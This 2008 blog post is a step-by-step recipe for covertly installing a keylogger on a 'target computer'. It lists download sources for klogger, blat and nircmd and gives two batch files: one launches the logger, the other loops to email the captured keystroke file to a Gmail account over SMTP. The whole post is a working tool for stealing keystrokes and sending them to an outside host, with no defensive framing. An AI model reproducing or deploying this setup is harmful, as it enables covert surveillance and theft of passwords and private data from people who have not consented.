Monday, January 28, 2008

Key logging made easy.

You will need klogger from:

http://ntsecurity.nu/toolbox/klogger/

You will need a gmail account.

You will need blat from:

http://sourceforge.net/project/showfiles.php?group_id=81910

And Nircmd:

http://www.nirsoft.net/utils/nircmd.html

Ok put everything in a single directory on a flash drive, or a cd. Just a directory you can drag onto the target computer.

You should have blat.dll blat.exe blat.obj klogger and nircmd.

Ok now we are going to make two .bat files.

One is start.bat and the executable for the program:

nircmd.exe execmd CALL klogger
nircmd.exe execmd CALL go.bat

The next one is go.bat and you will need to do some editing to it.

goto THREE
:THREE
ping 127.0.0.1 -n 100 -w 1000> nul
REM the ping acts as a wait
Blat klogger.txt -to bsdpunk@gmail.com -u bsdpunk@gmail.com -p password -f
bsdpunk@gmail.com -server gsmtp183.google.com
REM Please don’t use my email address use your own and your own password etc.
goto THREE


You should now have blat.dll blat.exe blat.obj go.bat klogger nircmd and start.bat.

Just drag your folder with these files to the target computer and run start.bat.


EDIT You will need to use a different server as gsmtp183.google.com is no longer
EDIT Publicly Availiable

No comments: